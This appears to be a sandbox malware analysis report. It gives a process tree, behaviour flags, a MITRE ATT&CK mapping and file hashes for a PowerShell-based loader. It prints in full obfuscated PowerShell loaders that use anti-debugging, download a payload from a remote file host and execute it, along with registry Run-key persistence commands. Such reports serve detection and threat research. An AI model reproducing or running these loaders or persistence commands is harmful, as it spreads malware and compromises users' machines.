(Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion (Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
1⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Galgebakkernes.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Naborets.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3104
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1604
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 2236
    3⤵
    - Program crash
    PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3320 -ip 3320
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4700 -ip 4700
1⤵
PID:4708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

Filesize
2KB

MD5
124691a6b419b4b5ecb13a04e550317d

SHA1
73849d94dd67c60291deffb473465d1d7329a161

SHA256
965fdfa484d6c76c9d8c44d19e6aa5773982ab7bcb2c91d25a31b94b91d57456

SHA512
bfe5705af8a2314879c8a70bd68f3bd22a4be3bfd13b37e0d6333a9c9baf25e32d531ea114c8b469b16193c4e0b2c3a09d78b51d4915cf209cd58be04b753ecb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_90B17EDAFA78E1CF65547D865DF1EA1B

Filesize
472B

MD5
96e0e02480b6b8d1b095aefef2b29501

SHA1
a46b442cc254229374e424e43f5c6d3207be01fb

SHA256
fcaf1056e6f345aaeed01beb1e466da6d1ef81c8fcbc15c0c32cf73ddb8db90a

SHA512
6a783bde7903e32bc92f91ea48af92157f6a9d395520e2df86ae895b33d5ec426294ce0d37c6f02be342252f36eb541cc2e0b71ec32f9dce77e42a6006dd067e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
9bd77d27f83e3605d6e84113abed7671

SHA1
779e99f2ceb6f2fec66e6e278ed194b0307912a1

SHA256
75fa5e045110700fc13c9084b4cb19c92fe36676ad5cad853690499a93fe3107

SHA512
3467f48a0aa77551f88bac2c31ee4475e32e6e6606e6cbee4f8779c11083eec2e499c10210986b86882db7c9da4a0bcecf0aae1a6a988fb88329476e1b55153d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

Filesize
484B

MD5
513149153f33f02fcfb2261f4d065763

SHA1
dd59e9497e622d64ce00641e01a4f47ad6b9a942

SHA256
7d1776e11f7c576027fd7ed103dc7434c4dfa9912ddffa33cd374bd6f6959b68

SHA512
ea25b9d5170fa0d8bfa88077905878db1ad3cc01f1890698e2a980feddf8bf358dd022db6f37f91b1518b2aeb377d94239bc5d5fc01899bc1247c9e0bfee0412

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_90B17EDAFA78E1CF65547D865DF1EA1B

Filesize
488B

MD5
2f699bcdcb0bcb66489bb0b11eda08c4

SHA1
7b55f0a94dc5bed57416e5dc918a61713064c994

SHA256
afa474661a4bbe494c3aba943d2ebd4c3da465dfea1bfa8ff9e3e7b36afee31c

SHA512
e1550ad0c6f853885a63ccbf450cf2d3dbc21f2773be55f2b5c48a75d9a97afaf9665f79648b285c1bd975929c96dd885961dd019404a8c5c70c9d1e241fbf41

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
482B

MD5
45c0c4990d4004ff59b0fe7dd9d2f103

SHA1
cdf3cb426633ba30b77d9acf11d384ac8e874827

SHA256
ecce26cf3346c2023709fe183e138239e498e912717cc1d5913f5562c946aa7c

SHA512
652dc2da68694e46037a976281915e85da0e2e76b13e6701cf98b4a5ee2c554bc20a72a6f10733b2fd3c608404c0f4da54f4089a403fabc055b9994036cc41ed

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.cdf-ms

Filesize
24KB

MD5
80e311c1e60785f6abe58fe5d33a17a7

SHA1
d32bca8d8cf422a586764711d42dbbe244c1216d

SHA256
bd1b0a2295703ed7c63cad98db2e4be1fdbcd2d4e2fc6be27d9ede51f11172b2

SHA512
02132024635b73aaf494e20e55307fe0da4a6bbaec53f04d4cbf96b5ad9e3afd974e748e267352cd1a1af6e7d1a52e9aa8de9583b061bf7bdb28d8b33a36a659

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.cdf-ms

Filesize
3KB

MD5
4c43472f60dc0f92b96fa3c3761eb4fb

SHA1
d9f54bdf5443ba930eabe71219dcd86e7a07468c

SHA256
43c25dcfbe5a8cae5357c840dfdf10a4f3beeb5dd498352e712739c0eb41c00b

SHA512
bb81a226ae668fc3ed333b49900fadbe45ebf6ca6a1c5f035d4154e3014f4bfb03d2c3e12fbcffdbf7b1960bb5acbf02355e71fd4ee2c2d7728c584d367e660a

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.cdf-ms

Filesize
5KB

MD5
a5e15960e4375203cf8f600da7a64f1a

SHA1
038e3a96dd87deff4ee49837387a2dfa917b7788

SHA256
46587148245de8133e1688a6d606b19f296168a90361386cd40d98c2ed45d1db

SHA512
2c83df93b2437943a2abb27e032dead74e93e36a66faf1d0085ceff6aa63a28e678671adba1773e0952cbde8df5450446a2f5cac07f357bdd041bfea33f15d81

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.cdf-ms

Filesize
6KB

MD5
36b2499d9be57bc19f0a64d6b8ac42be

SHA1
bba71fad1b7ea1ed713c70a88a1a7c08b910dd5c

SHA256
736b5e1c641bb0ff069e71c1be1dc7719ccca1b991a8e94dade0827556b9b2a7

SHA512
a8329aba96bb1aad2c1fe40c04bb398826b05c2e4b832a1127d26ed46d78af013c3c9ce378ef60e88bf8f64175608ef85c53feb3564b34f16e047d5cba0ba5f3

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.cdf-ms

Filesize
2KB

MD5
233e006843cd44a36607650562804252

SHA1
7e24b5ef47210dad71e01ad955a390d9efb9ec60

SHA256
